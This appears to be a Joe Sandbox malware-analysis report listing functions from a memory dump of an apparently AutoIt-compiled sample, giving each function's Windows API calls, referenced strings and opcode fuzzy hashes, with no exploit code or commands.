Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 34e61837f71d2e45295b600b1157fe1e990a1a028c3f22ba1bf549d9246902c5
Instruction ID: 16a97234af9fc1b883ada7e5071e3f784b5bd09d6dceacf3a70182c7b01e6959
Opcode Fuzzy Hash: 34e61837f71d2e45295b600b1157fe1e990a1a028c3f22ba1bf549d9246902c5
Instruction Fuzzy Hash: 23F09032240158BBE3615B929C0DFEF7B3CEFC6B22F100159FE0091050E7A01A1587B9

Function 00C577EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00C577FE
EnterCriticalSection.KERNEL32(?,?,00BFC2B6,?,?), ref: 00C5780F
TerminateThread.KERNEL32(00000000,000001F6,?,00BFC2B6,?,?), ref: 00C5781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00BFC2B6,?,?), ref: 00C57829

Part of subcall function 00C571F0: CloseHandle.KERNEL32(00000000,?,00C57836,?,00BFC2B6,?,?), ref: 00C571FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 00C5783C
LeaveCriticalSection.KERNEL32(?,?,00BFC2B6,?,?), ref: 00C57843

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 13c677dbaa605beb7fe11c6aaf7df64a132d2f35fd248a7d9392a47baffd78b2
Instruction ID: 0037b3e08c813f29477f56a5beab48e63d89da4cc19a88f0ddd0500896661d40
Opcode Fuzzy Hash: 13c677dbaa605beb7fe11c6aaf7df64a132d2f35fd248a7d9392a47baffd78b2
Instruction Fuzzy Hash: 46F0B836044202ABD3912B64EC8CBAF372AFF09312F240121F602A00A1CBB55899CB68

Function 00C4954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C49555
UnloadUserProfile.USERENV(?,?), ref: 00C49561
CloseHandle.KERNEL32(?), ref: 00C4956A
CloseHandle.KERNEL32(?), ref: 00C49572
GetProcessHeap.KERNEL32(00000000,?), ref: 00C4957B
HeapFree.KERNEL32(00000000), ref: 00C49582

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 3b7c18cba2b6f64f0c10a00ce3c17087f44f5bfe03eeaa46f9ab0dd4158ceeee
Instruction ID: 19887981e785de00a6429d813cb6b6bf478b750e64132312c5ae9fe900d08a7c
Opcode Fuzzy Hash: 3b7c18cba2b6f64f0c10a00ce3c17087f44f5bfe03eeaa46f9ab0dd4158ceeee
Instruction Fuzzy Hash: CAE0E536004201BBDB811FE1EC0CB5EBF39FF49722F204220F22581074CB32A468DB58

Function 00C68CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C68CFD
CharUpperBuffW.USER32(?,?), ref: 00C68E0C
VariantClear.OLEAUT32(?), ref: 00C68F84

Part of subcall function 00C57B1D: VariantInit.OLEAUT32(00000000), ref: 00C57B5D
Part of subcall function 00C57B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00C57B66
Part of subcall function 00C57B1D: VariantClear.OLEAUT32(00000000), ref: 00C57B72

Strings

AUTOIT.ERROR, xrefs: 00C68E12
Incorrect Parameter format, xrefs: 00C68D35, 00C68EF7

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 9ac6f497a723c8d3eca000d36fe8c07ad8ccb8c7d457edb5991f3bb2253773a6
Instruction ID: 53b62c8ad5da9055e53ce95f6f49dfb920269f949f5251e5744497365becd62f
Opcode Fuzzy Hash: 9ac6f497a723c8d3eca000d36fe8c07ad8ccb8c7d457edb5991f3bb2253773a6
Instruction Fuzzy Hash: A3919E746043019FC710DF24C48096ABBF5EF89714F144A6DF99A8B3A2DB31ED49CB52

Function 00C5323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C0436A: _wcscpy.LIBCMT ref: 00C0438D

_memset.LIBCMT ref: 00C5332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C5335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C53410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C5343E

Strings

0, xrefs: 00C5331A

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 6b022e27b77767a6a8bbf3a381ce7a891b7f287c10d112fccfa453be06b5bcf1
Instruction ID: f545ee0347251e25c6530e51859137c57987ba3d9b3491a9e788ad660c284353
Opcode Fuzzy Hash: 6b022e27b77767a6a8bbf3a381ce7a891b7f287c10d112fccfa453be06b5bcf1
Instruction Fuzzy Hash: 2F51E5356083809BD7169E28C84566BBBE4AF85391F04462DFCA1D31E1DB70CF88D75A

Function 00C52EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C52F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C52F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00C52FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CB7890,00000000), ref: 00C53012

Strings

0, xrefs: 00C52F5C

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 55b5f43480d548bb29089da3bd09bba6c6414def6c23fadf54be3e3962083c01
Instruction ID: df04d71918f9113519f50d7f70eaa9d7a46363149e8dcf49018c8f1518bcb659
Opcode Fuzzy Hash: 55b5f43480d548bb29089da3bd09bba6c6414def6c23fadf54be3e3962083c01
Instruction Fuzzy Hash: 414106352043819FD720DF24C884B1ABBE4EF85351F14461EFC659B2D1D770EA49CB6A

Function 00C49A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C4B7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C49ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C49ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00C49B0F

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

Strings

ListBox, xrefs: 00C49A8B
ComboBox, xrefs: 00C49A56

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: afda6af53e42eec8d3c48eebbf903e18cbed8f3ee65bb1c07dd938258d200811
Instruction ID: ba500bbf180b802a22ff8a7816270c245e1d1b933e044a69e54f9214cbc21e21
Opcode Fuzzy Hash: afda6af53e42eec8d3c48eebbf903e18cbed8f3ee65bb1c07dd938258d200811
Instruction Fuzzy Hash: 4421B171A01114BFDB24EBA4DC8ADFFB778EF46360F244219F825972D1DB344A4AE660

Function 00C76A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF214F
Part of subcall function 00BF2111: GetStockObject.GDI32(00000011), ref: 00BF2163
Part of subcall function 00BF2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C76A86
LoadLibraryW.KERNEL32(?), ref: 00C76A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C76AA2
DestroyWindow.USER32(?), ref: 00C76AAA

Strings

SysAnimate32, xrefs: 00C76A61

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: a7dabd7307357efda169e0c567ca6d440ecfd4c9848980215b3d650cca9b7c34
Instruction ID: f0e4ba782db50df66e69ede724e6b13ecd5aaf470504a75a266337a03e489fad
Opcode Fuzzy Hash: a7dabd7307357efda169e0c567ca6d440ecfd4c9848980215b3d650cca9b7c34
Instruction Fuzzy Hash: E0215B71200A05AFEF108FA4DC81FBB77ADEB59374F10C629FA69A3190D7719C51AB60

Function 00C57357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00C57377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C573AA
GetStdHandle.KERNEL32(0000000C), ref: 00C573BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C573F6

Strings

nul, xrefs: 00C573F1

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: a4a8ba4b97d23506b1883880845c6d06be4d1f4719586bb5090a140aa071203d
Instruction ID: 6c9fc0712cc929d6da6b3fa173eb2ab8b08cf2ead81cf3cf97ce134061dcaf00
Opcode Fuzzy Hash: a4a8ba4b97d23506b1883880845c6d06be4d1f4719586bb5090a140aa071203d
Instruction Fuzzy Hash: 042171795042069BDB208F65EC09A9E7BA4AF44731F204B19FCB0D72E1D770D9D8DB54

Function 00C57425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C57444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C57476
GetStdHandle.KERNEL32(000000F6), ref: 00C57487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C574C1

Strings

nul, xrefs: 00C574BC

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f4c6e00150c94f676fd20777b84da19b241f87e24ea5359db5e657248c907138
Instruction ID: 15c4e1c6a2fa82a398c2c5b904e25fe3174f8d25c1dd81fd5f6fbc4b5f884f63
Opcode Fuzzy Hash: f4c6e00150c94f676fd20777b84da19b241f87e24ea5359db5e657248c907138
Instruction Fuzzy Hash: C421B5395042059BDB209F69AC48B5D7BA8AF45731F200B19FDB0E72D1D77099C8CB58

Function 00C5B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C5B297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C5B2EB
__swprintf.LIBCMT ref: 00C5B304
SetErrorMode.KERNEL32(00000000,00000001,00000000,00C80980), ref: 00C5B342

Strings

%lu, xrefs: 00C5B2FE

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 2fe2c1881759fba31b3c2bcfc53d974b06080730619918fa6bb05694832e23fe
Instruction ID: 52a861cb814ca6a357b2478af0e384a5f05cdfd4bbf15edff2212a6a259db733
Opcode Fuzzy Hash: 2fe2c1881759fba31b3c2bcfc53d974b06080730619918fa6bb05694832e23fe
Instruction Fuzzy Hash: 4C217134A00109AFCB10DF65CC85EAEBBB8EF89714F1040A9F909E7252DB71EE45DB61

Function 00C4AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

Part of subcall function 00C4AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C4AA6F
Part of subcall function 00C4AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4AA82
Part of subcall function 00C4AA52: GetCurrentThreadId.KERNEL32 ref: 00C4AA89
Part of subcall function 00C4AA52: AttachThreadInput.USER32(00000000), ref: 00C4AA90

GetFocus.USER32 ref: 00C4AC2A

Part of subcall function 00C4AA9B: GetParent.USER32(?), ref: 00C4AAA9

GetClassNameW.USER32(?,?,00000100), ref: 00C4AC73
EnumChildWindows.USER32(?,00C4ACEB), ref: 00C4AC9B
__swprintf.LIBCMT ref: 00C4ACB5

Strings

%s%d, xrefs: 00C4ACAF

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 1e3206171629c3c2d315a19867c03c02f217a2e6cd022d5da9903300d944a015
Instruction ID: f756ced80839d6b5cebbbfe7e8dc147976ae1e78ceb484e9b08fdbdf70eaf59b
Opcode Fuzzy Hash: 1e3206171629c3c2d315a19867c03c02f217a2e6cd022d5da9903300d944a015
Instruction Fuzzy Hash: 4E11E174240205ABDF51BFA0CD85FEA776CBF84310F108075FE08AA183DA715949EB75

Function 00C522E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C52318

Strings

EXISTS, xrefs: 00C52340
KEYS, xrefs: 00C5232F
REMOVE, xrefs: 00C5231E
APPEND, xrefs: 00C52351

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 2b3367cb7240c71991a9360d3730437b892b4d4711b02c40fad43fdc609ca4a2
Instruction ID: 32f4e4206e1cf81105a24ac548cfdd9ab44a788e8544bbf22d58f3243b3711e4
Opcode Fuzzy Hash: 2b3367cb7240c71991a9360d3730437b892b4d4711b02c40fad43fdc609ca4a2
Instruction Fuzzy Hash: E1117C749001199BCF00EF94D8508EEB3B8FF17304B204068E81067262EB326E8AEF40

Function 00C6F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C6F2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C6F320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C6F453
CloseHandle.KERNEL32(?), ref: 00C6F4D4

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 2f87b347776da4ff56becc7ce489ca4c3089cd63a1728b57fbdd2bd9d17059e1
Instruction ID: e67000eb8bec14dcf68a7cfda6b0b437326e2d744f7b6d12f987116b05f1d32b
Opcode Fuzzy Hash: 2f87b347776da4ff56becc7ce489ca4c3089cd63a1728b57fbdd2bd9d17059e1
Instruction Fuzzy Hash: 0E8180756003009FD720EF28D886F3BB7E5AF44710F14896DFA99DB292DBB0AD458B91

Function 00C70697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7040D,?,?), ref: 00C71491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C707E3
RegCloseKey.ADVAPI32(?,?), ref: 00C7080F
RegCloseKey.ADVAPI32(00000000), ref: 00C7081C

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: c63e715d50aa356bda1aab36265106166e01a0e7e2391dfbc27c27c18b6ed13c
Instruction ID: 4139c382afa28d44e4c166e9fb87b7564d8b143d4e7c1bc31c14c09d2299d1ba
Opcode Fuzzy Hash: c63e715d50aa356bda1aab36265106166e01a0e7e2391dfbc27c27c18b6ed13c
Instruction Fuzzy Hash: 45514971208204AFD714EF64C881F6EB7E9FF84714F14891DF99A972A2DB30E909DB52

Function 00C5EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C5EC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C5EC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C5ECCA

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C5ECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C5ECF7

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 553a6ce029ed34dcaab0f467197c96fefbaa8d65ba2973a71fe71aa064bd821f
Instruction ID: 3382d335d38378010555e865847e709a3bffa93ef2885117c48f5a41b8152eac
Opcode Fuzzy Hash: 553a6ce029ed34dcaab0f467197c96fefbaa8d65ba2973a71fe71aa064bd821f
Instruction Fuzzy Hash: 97514D39A00509DFCB05EF64C985EAEBBF5EF09310B1480A9E909AB361CB31EE55DF54

Function 00C7A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
